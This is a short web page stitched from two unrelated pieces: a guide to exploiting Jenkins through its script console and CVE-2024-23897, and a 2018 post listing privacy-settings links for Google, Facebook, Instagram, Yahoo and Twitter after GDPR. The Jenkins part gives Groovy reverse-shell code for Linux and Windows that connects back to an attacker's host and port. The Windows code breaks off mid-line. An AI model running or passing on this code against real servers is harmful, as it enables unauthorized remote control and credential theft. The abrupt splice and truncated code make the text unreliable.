Exploiting Jenkins / CVE-2024-23897

Often the script console at http://JENKINS_IP/script is accessible without authentication due to misconfiguration.

If you don't have access to the script console and the version is vulnerable to CVE-2024-23897, then exploit it to read files and get authentication credentials for Jenkins (explained below).

Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script.

For Linux,

    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    p.waitFor()

For Windows,

    String host="YOUR_IP";
    int port=PORT;
    String cmd="cmd.exe";
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s=new Socket(host,port);
    InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
    OutputStream po=p.getOutputStrea...

So, May 2018 was a remarkable month in the world of data security. The European GDPR is now in effect, and almost all tech giants are adjusting themselves to comply with its data privacy standards.
I have consolidated the privacy policies of the top 5 companies, along with the links for adjusting and controlling your data privacy. Review your privacy settings and control your own privacy.
Google
Adjust Privacy Settings : https://myaccount.google.com/intro/privacy
Facebook
Privacy Policy : https://www.facebook.com/privacy/explanation
Adjust Privacy Settings : https://www.facebook.com/settings?tab=privacy
Instagram
Adjust Privacy Settings : https://help.instagram.com/196883487377501
Yahoo
Privacy Policy : https://policies.oath.com/ie/en/oath/privacy/index.html
Adjust Privacy Settings : https://policies.oath.com/us/en/oath/privacy/controls/index.html
Twitter
Adjust Privacy Settings : https://twitter.com/settings/account